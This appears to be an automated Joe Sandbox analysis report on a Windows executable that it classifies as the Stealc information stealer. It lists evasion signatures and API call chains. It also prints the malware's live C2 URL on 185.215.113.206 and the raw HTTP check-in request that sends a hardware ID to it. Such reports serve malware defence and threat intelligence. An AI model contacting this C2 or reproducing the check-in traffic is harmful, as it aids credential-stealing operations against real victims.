Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1561529
MD5:915ecb2949f1c2ad737caa35856b4584
SHA1:deaf66961d8b2dda755377ab791b8907b71cf9b5
SHA256:9784693e6d3fe06c253e47536652da2ac85aa94b2d05d83230b2f9734529f854
Tags:exeuser-Bitsight
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found evaded block containing many API calls
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 5296 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 915ECB2949F1C2AD737CAA35856B4584)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.206/c4becf79229cb002.php", "Botnet": "mars"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000003.2040482339.0000000004EE0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000000.00000002.2082518165.000000000118E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          Process Memory Space: file.exe PID: 5296JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Process Memory Space: file.exe PID: 5296JoeSecurity_StealcYara detected StealcJoe Security

              Sigma Signatures

              No Sigma rule has matched

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-23T16:54:02.395097+010020442431Malware Command and Control Activity Detected192.168.2.549704185.215.113.20680TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus / Scanner detection for submitted sample
              Source: file.exeAvira: detected
              Antivirus detection for URL or domain
              Source: http://185.215.113.206/c4becf79229cb002.php/KAvira URL Cloud: Label: malware
              Found malware configuration
              Source: file.exe.5296.0.memstrminMalware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/c4becf79229cb002.php", "Botnet": "mars"}
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Machine Learning detection for sample
              Source: file.exeJoe Sandbox ML: detected
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00514C50 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrcpy,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,0_2_00514C50
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005160D0 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,GetProcessHeap,RtlAllocateHeap,lstrlen,lstrlen,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,0_2_005160D0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005340B0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_005340B0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00526960 lstrcpy,SHGetFolderPathA,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,LocalAlloc,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetProcessHeap,RtlAllocateHeap,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrlen,lstrlen,lstrlen,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,0_2_00526960
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0051EA30 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,0_2_0051EA30
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00526B79 lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetProcessHeap,RtlAllocateHeap,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrlen,lstrlen,lstrlen,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,0_2_00526B79
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00519B20 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_00519B20
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00519B80 CryptUnprotectData,LocalAlloc,LocalFree,0_2_00519B80
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00517750 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_00517750
              Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005218A0 lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_005218A0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00523910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,DeleteFileA,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00523910
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00521250 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00521250
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00521269 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00521269
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0052E210 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_0052E210
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00524B10 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00524B10
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00524B29 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_00524B29
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0052CBE0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,CreateFileA,GetFileSizeEx,CloseHandle,CloseHandle,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_0052CBE0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00522390 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,0_2_00522390
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0051DB99 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_0051DB99
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0051DB80 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,GetFileAttributesA,StrCmpCA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_0051DB80
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005223A9 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_005223A9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0052D530 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_0052D530
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0052DD30 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,lstrcpy,0_2_0052DD30
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005116B9 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_005116B9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005116A0 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_005116A0

              Networking

              barindex
              Suricata IDS alerts for network traffic
              Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49704 -> 185.215.113.206:80
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorURLs: http://185.215.113.206/c4becf79229cb002.php
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KKFCAAKFBAEHJJJJDHIEHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4b 46 43 41 41 4b 46 42 41 45 48 4a 4a 4a 4a 44 48 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 33 42 32 38 44 30 44 45 31 33 45 34 32 35 35 38 33 30 34 33 38 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 46 43 41 41 4b 46 42 41 45 48 4a 4a 4a 4a 44 48 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 46 43 41 41 4b 46 42 41 45 48 4a 4a 4a 4a 44 48 49 45 2d 2d 0d 0a Data Ascii: ------KKFCAAKFBAEHJJJJDHIEContent-Disposition: form-data; name="hwid"93B28D0DE13E4255830438------KKFCAAKFBAEHJJJJDHIEContent-Disposition: form-data; name="build"mars------KKFCAAKFBAEHJJJJDHIE--
              Source: Joe Sandbox ViewIP Address: 185.215.113.206 185.215.113.206
              Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00514C50 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrcpy,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,0_2_00514C50
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
              Source: unknownHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KKFCAAKFBAEHJJJJDHIEHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4b 46 43 41 41 4b 46 42 41 45 48 4a 4a 4a 4a 44 48 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 33 42 32 38 44 30 44 45 31 33 45 34 32 35 35 38 33 30 34 33 38 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 46 43 41 41 4b 46 42 41 45 48 4a 4a 4a 4a 44 48 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 46 43 41 41 4b 46 42 41 45 48 4a 4a 4a 4a 44 48 49 45 2d 2d 0d 0a Data Ascii: ------KKFCAAKFBAEHJJJJDHIEContent-Disposition: form-data; name="hwid"93B28D0DE13E4255830438------KKFCAAKFBAEHJJJJDHIEContent-Disposition: form-data; name="build"mars------KKFCAAKFBAEHJJJJDHIE--
              Source: file.exe, 00000000.00000002.2082518165.000000000118E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206
              Source: file.exe, 00000000.00000002.2082518165.00000000011E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/
              Source: file.exe, 00000000.00000002.2082518165.00000000011E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.php
              Source: file.exe, 00000000.00000002.2082518165.00000000011E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.php/
              Source: file.exe, 00000000.00000002.2082518165.00000000011E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.php/K
              Source: file.exe, 00000000.00000002.2082518165.00000000011E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.php?
              Source: file.exe, 00000000.00000002.2082518165.000000000118E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206Z
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00519770 memset,memset,lstrcat,lstrcat,lstrcat,memset,wsprintfA,OpenDesktopA,CreateDesktopA,memset,lstrcat,lstrcat,lstrcat,memset,SHGetFolderPathA,lstrcpy,StrStrA,lstrcpyn,lstrlen,wsprintfA,lstrcpy,memset,Sleep,CloseDesktop,0_2_00519770

              System Summary

              barindex
              PE file contains section with special chars
              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: .idata
              Source: file.exeStatic PE information: section name:
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0083601D0_2_0083601D
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005348B00_2_005348B0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008CE1BC0_2_008CE1BC
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007D693F0_2_007D693F
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008CC1E30_2_008CC1E3
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008D890D0_2_008D890D
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008CF93B0_2_008CF93B
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008A8AAE0_2_008A8AAE
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008C8B530_2_008C8B53
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009BE4100_2_009BE410
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008D142C0_2_008D142C
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008D65CC0_2_008D65CC
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008A85F60_2_008A85F6
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008C55140_2_008C5514
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0079AD850_2_0079AD85
